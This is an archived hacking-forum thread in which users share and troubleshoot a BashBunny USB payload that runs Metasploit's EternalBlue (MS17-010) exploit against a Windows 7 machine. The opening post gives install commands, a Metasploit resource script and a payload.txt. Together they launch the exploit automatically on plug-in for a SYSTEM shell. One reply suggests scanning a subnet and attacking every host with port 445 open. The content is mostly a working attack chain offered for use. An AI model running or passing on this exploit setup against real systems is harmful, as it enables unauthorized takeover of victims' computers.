hanshaze Posted September 25, 2017 Share Posted September 25, 2017 My latest BashBunny-Challenge.....MSF - MS17_010 - BashBunny Thanks to Astr0baby, iam just a sharer of his excellent thoughts Lets go..... Make sure to set some date for TLS/SSL to work ;) # date -s "20170925" Add this to /etc/apt/sources.list deb http://http.us.debian.org/debian/ jessie-updates main # apt-get update # apt-get -y install autoconf bison build-essential curl git-core libapr1 libaprutil1 libcurl4-openssl-dev libgmp3-dev # curl -sSL https://get.rvm.io | bash -s stable # source /etc/profile.d/rvm.sh # rvm requirements # rvm list known # rvm install 2.4.1 # vi /root/.bashrc Add at the end source /etc/profile/rvm.sh rvm use 2.4.1 --default # mkdir /root/METASPLOIT # cd /root/METASPLOIT/ # wget https://raw.githubusercontent.com/iam1980/metasploit-vps-installer/master/msf_vps_installer.sh # chmod +x msf_vps_installer.sh # ./msf_vps_installer.sh # git config --global user.name "USER" # git config --global user.email "user@example.com" # ./msfupdate Check the /etc/dhcp/dhcpd.conf range 172.16.64.10 - 172.16.64.12 and set to only one value range 172.16.64.64 - 172.16.64.64 Save this to ~/metasploit-framework as cmd.rc ----- use exploit/windows/smb/ms17_010_eternalblue set PAYLOAD windows/x64/exec set RHOST 172.16.64.64 set CMD cmd.exe exploit ----- The above is ideal when we want to get a NT SYSTEM/AUTHORITY shell on the target Windows 7 SP1 x64 (unlocked) If the target is locked we can use another payload such this one So RHOST would be again 172.16.64.64 and LHOST 172.16.64.1 … This can be easily scripted via Metasploit RC script so ;) The Metasploit RC scripts should be placed in the /root/metasploit-framework on the Bashbunny so we can call it from the PAYLOAD.TXT for the corresponding Attach Switch position . So ideally this would look like this (switch1 or switch 2) payload.txt #!/bin/bash LED SETUP ATTACKMODE RNDIS_ETHERNET #Set some current time ..... check your watch date -s "20170523 23:23" LED ATTACK /root/metasploit-framework/msfconsole -r /root/metasploit-framework/eternal-cmd.rc & LED FINISH The target Windows 7 should have an accessible SMB port 445 from the USB network that Bashbunny device create. Default Windows system has a firewall on so the attack wont work as the port is blocked. For the demonstration purpose we assume there is no firewall on .. After a while you should get a NT AUTHORITY\ SYSTEM cmd shell pop up on your Win 7 desktop :) Link to comment Share on other sites More sharing options...
i8igmac Posted September 25, 2017 Share Posted September 25, 2017 Perform nmap scan in metasploit. On the subnet, discover all device on port 445 then use the metasploit database to launch the attack on all devices discovered. I made some assumptions on your scenario. Link to comment Share on other sites More sharing options...
v0dka Posted December 24, 2017 Share Posted December 24, 2017 helloooo I met a problem: I wrote a payload.txt as you told But it didnt run metasploit at all. So I add a "source /etc/profile.d/rvm.sh" to the payload. Msf will run for a moment as follows: root@bunny:~# ps -aux | grep 'metasploit' root 920 33.4 8.3 57556 42496 ? Sl 13:18 0:10 ruby /root/metasploit-framework/msfconsole -r /root/metasploit-framework/1.rc root 1115 0.0 0.1 2072 544 pts/0 S+ 13:19 0:00 grep metasploit root@bunny:~# But It will stop after that. root@bunny:~# ps -aux | grep 'metasploit' root 1220 0.0 0.1 2068 544 pts/0 S+ 13:19 0:00 grep metasploit No payload will execute . I tried to debug it as command : ruby /root/metasploit-framework/msfconsole -r /root/metasploit-framework/1.rc >> /root/udisk/exp/msf.log But the file is empty this command will work if I execute it in BashBunny SSH. The payload also worked if I replace it with another command. So I dont know why It doesnt work. Thanks in advance Link to comment Share on other sites More sharing options...
b0N3z Posted December 25, 2017 Share Posted December 25, 2017 I've notice the last metasploit payload made had an rc file that it executed and ran flawlessly if configured right. Also make sure metasploit is connected to a database with you can make by downloading the msfdb script from GitHub, give it a quick edit for the bunny and execute. Worked great for me Link to comment Share on other sites More sharing options...
thatalbinofrog Posted January 28, 2019 Share Posted January 28, 2019 On 12/26/2017 at 5:23 AM, b0N3z said: I've notice the last metasploit payload made had an rc file that it executed and ran flawlessly if configured right. Also make sure metasploit is connected to a database with you can make by downloading the msfdb script from GitHub, give it a quick edit for the bunny and execute. Worked great for me I've got this 90% up and running, but can't get metasploit to connect to the postgresql database. Can you please explain how to do this step in further detail? Thanks! Link to comment Share on other sites More sharing options...
Just_a_User Posted January 28, 2019 Share Posted January 28, 2019 1 hour ago, thatalbinofrog said: Can you please explain how to do this step in further detail? In the past I had issues with this and this guy helped me with this command Link to comment Share on other sites More sharing options...
thatalbinofrog Posted January 29, 2019 Share Posted January 29, 2019 11 hours ago, Just_a_User said: In the past I had issues with this and this guy helped me with this command Thanks for the reply, but that command didn't help. My database.yml file would not generate, do you know how to fix this? Link to comment Share on other sites More sharing options...
b0N3z Posted January 31, 2019 Share Posted January 31, 2019 @thatalbinofrog I looked up how to make a metasploit database and tried a couple different things till I got it. I cant quite remember how I did it though Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted February 1, 2019 Share Posted February 1, 2019 Hmm, so I have a thought. Since this is only for one payload, why not try just using the module for eternal blue and the user's custom shellcode to execute code? The Bunny setup would be easier and the spinup would be a lot faster and less extensive for the BashBunny. Link to comment Share on other sites More sharing options...
hanshaze Posted January 1, 2020 Author Share Posted January 1, 2020 On 1/28/2019 at 3:53 PM, thatalbinofrog said: I've got this 90% up and running, but can't get metasploit to connect to the postgresql database. Can you please explain how to do this step in further detail? Thanks! sudo /etc/init.d/postgresql start && sudo msfdb init # or sudo systemctl daemon-reload && sudo pg_ctlcluster 12 main start Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.